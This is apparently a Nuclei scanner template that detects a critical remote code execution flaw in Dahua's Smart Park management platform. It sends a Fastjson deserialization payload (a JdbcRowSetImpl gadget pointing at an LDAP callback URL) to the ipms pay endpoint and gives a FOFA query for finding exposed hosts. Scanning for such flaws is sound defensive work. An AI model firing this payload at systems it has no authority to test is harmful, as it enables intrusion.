http:
    - extractors:
        - kval:
            - interactsh_ip
          type: kval
      matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      matchers-condition: and
      raw:
        - |
          POST /ipms/barpay/pay HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/json

          {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://{{interactsh-url}}", "autoCommit": true}
id: dahua-smart-park-ipms-rce
info:
    author: SleepingBag945
    description: |
        FOFA: body="/WPMS"
        header_string = "hauc"
    name: 大华智慧园区综合管理平台 ipms 远程代码执行漏洞
    severity: critical
    tags:
        - dahua
        - 大华智慧园区综合管理平台
